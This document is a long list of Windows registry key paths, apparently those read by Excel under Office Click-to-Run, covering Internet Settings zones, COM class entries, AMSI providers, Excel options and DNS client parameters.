HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Compression
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Elevation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NameBoxWidth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\AMSI\Providers
HKEY_LOCAL_MACHINE\Software\Microsoft\AMSI\Providers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\AMSI
HKEY_LOCAL_MACHINE\Software\Microsoft\AMSI
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\AMSI\FeatureBits
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\3dDialogs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\StatusBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\StatusBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAccChecker
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\System\CurrentControlSet\Services\DNS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ValidateResponseNames
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ValidateResponseNames
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableSmartNameResolution
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartNameResolution
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\PreferLocalOverLowerBindingDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\PreferLocalOverLowerBindingDNS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\QueryNetBTFQDN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryNetBTFQDN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableSmartProtocolReordering
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartProtocolReordering
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UdpRecvBufferSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UdpRecvBufferSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EdnsMaxBufferSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EdnsMaxBufferSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableParallelAandAAAA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableParallelAandAAAA
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableCoalescing
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableCoalescing
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\FilterVPNTrigger
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterVPNTrigger
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableMultiHomedRouteConflicts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMultiHomedRouteConflicts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ForceQueriesOverTcp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShareTcpConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TcpIgnoreInterfaceForServerSelection
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DoHPolicy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableAutoDoh
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\IgnoreMismatchedDnsResponse
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableDdr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableDdr
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DynamicRegistrationFallback
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxConcurrentQueryCount
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxConcurrentQueryCount
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableServerUnreachability
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableServerUnreachability
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableUdpSocketsCache
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableMulticast
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableMDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableNetbios
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableNetbios
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\NewDhcpSrvRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessPreferLocal
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableIdnEncoding
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableIdnEncoding
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableIdnMapping
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableIdnMapping
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShortnameProxyDefault
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableNRPTForAdapterRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableNRPTForAdapterRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TestMode_AdaptiveTimeoutHistoryLength
